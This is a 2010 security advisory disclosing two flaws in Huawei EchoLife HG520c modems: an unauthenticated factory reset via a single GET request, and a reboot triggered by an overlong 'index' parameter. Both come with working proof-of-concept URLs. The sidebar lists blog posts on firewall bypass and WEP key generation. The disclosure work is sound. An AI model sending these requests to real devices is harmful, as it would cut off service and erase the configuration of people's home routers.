Huawei EchoLife HG520c Denial of Service & Unauthorized Factory Reset

Huawei EchoLife HG520c Denial of Service & Unauthorized Factory Reset

Posted on May 13 2010   |  Plain text version

Summary

Huawei EchoLife HG520c modems are vulnerable to unauthorized device reset and denial of service vulnerabilities.

Description

# Product Link: http://www.huawei.com/mobileweb/en/products/view.do?id=660
# Firmware Versions: 3.10.18.7-1.0.7.0
# 3.10.18.5-1.0.7.0
# 3.10.18.4
# Software Versions: V100R001B120Telmex
# V100R001B121Telmex
websec Advisory: ws10-09


[Description #1]
=================
The page '/AutoRestart.html' restores the default configuration and reboots
the device. This page does not require authentication.

[Exploit #1]
=================
From LAN or Client Side, just send a simple GET request to:

http://192.168.1.254/AutoRestart.html



In case of having the remote interface enabled, from remote:

http:///AutoRestart.html
______________________________________________________________________


[Description #2]
=================
The page '/rpLocalDeviceJump.html' reboots the device when the 'index'
variable value has a length of more than 7 characters. Requires
authentication.

[Exploit #2]
=================

http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS
_____________________________________________________________________


Greets: Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, Chito, Kike,
House, Aldo, Chewi, Alex, Paco.


[email protected]


http://www.websec.mx

POC

http://192.168.1.254/AutoRestart.html

http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS


Recent From Blog

Bypassing Web Application Firewalls with SQLMap Tamper Scripts
An introduction to SQLMap's new tamper scripts and how the can be used to bypass Web Application Firewalls and Intrusion Detection Systems.
Posted in SQL Injection WAF SQLMap Tamper Scripts Firewall

Optimized Blind MySQL Injection Data Retrieval
Demonstrates a method to extract data from a MySQL database using blind injection in fewer requests than currently known techniques such as the Bisection and Bit Shift method.
Posted in Blind Injection MySQL SQL Injection Database

mac2wepkey - Huawei default WEP generator
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key. The purpose of this post is to explain the process of developing a key generator for these devices.
Posted in mac2wepkey home gateway wep generator echolife hg530 huawei hg520

Last News

Jan 31, 2012
Websec at Shmoocon 2012 Firetalks
Shmoocon is one of the best computer security conferences in the United States. Websec had the pleasure of being present in 2012 Shmoocon in January.

Dec 01, 2011
Discover Tectoria 2011
We are proud to announce that Websec will be participating at the Discover Tectoria 2011 tradeshow.

Last advisories